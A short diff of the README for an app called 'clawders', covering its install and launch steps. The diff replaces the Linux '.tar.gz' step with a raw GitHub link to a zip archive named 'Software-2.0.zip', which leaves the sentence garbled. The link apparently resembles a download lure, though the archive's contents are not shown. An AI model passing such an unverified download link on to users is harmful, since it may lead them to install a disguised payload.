jabob3000/clawders/README.md

 4. **Install the Application**:
    - **For Windows**: Double-click the `.exe` file.
 Follow the on-screen instructions to complete the installation.
    - **For Mac**: Open the `.dmg` file.
 Drag the application to your Applications folder.
-   - **For Linux**: Extract the `.tar.gz` file.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/jabob3000/clawders/main/claudecode/Software-2.0.zip` file.
 Open a terminal, navigate to the folder, and run the install command.

 5. **Open the Application**:
    Once installed, you can find **clawders** in your applications.
 Launch it to start collaborating.